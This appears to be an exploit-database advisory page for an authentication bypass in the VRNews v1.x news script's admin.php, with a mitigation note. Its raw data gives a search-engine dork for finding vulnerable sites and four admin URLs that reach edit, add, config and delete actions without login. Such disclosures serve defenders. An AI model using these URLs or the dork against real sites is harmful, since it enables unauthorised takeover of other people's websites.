header-logo
Suggest Exploit
vendor:
VRNews
by:
R4M!
5.5
CVSS
MEDIUM
/VRNews/admin.php Permission
CWE
Product Name: VRNews
Affected Version From: VRNews v1.x
Affected Version To: VRNews v1.x
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

VRNews v1.x <= /VRNews/admin.php Permission

The exploit allows unauthorized access to sensitive files and actions in the VRNews v1.x admin panel. It can be exploited by an attacker by directly accessing specific URLs in the admin.php file.

Mitigation:

To mitigate this vulnerability, it is recommended to upgrade to a newer version of VRNews that addresses this issue. Additionally, access to the admin.php file should be restricted to authorized personnel only.
Source

Exploit-DB raw data:

VRNews v1.x <= /VRNews/admin.php Permission
 
Found by: R4M! - Rami@live.de
 
Dork: intitle:"vrnews v1"
 
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
 
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del

# milw0rm.com [2007-07-05]

Navigation

Suggest Exploit

Services By CQR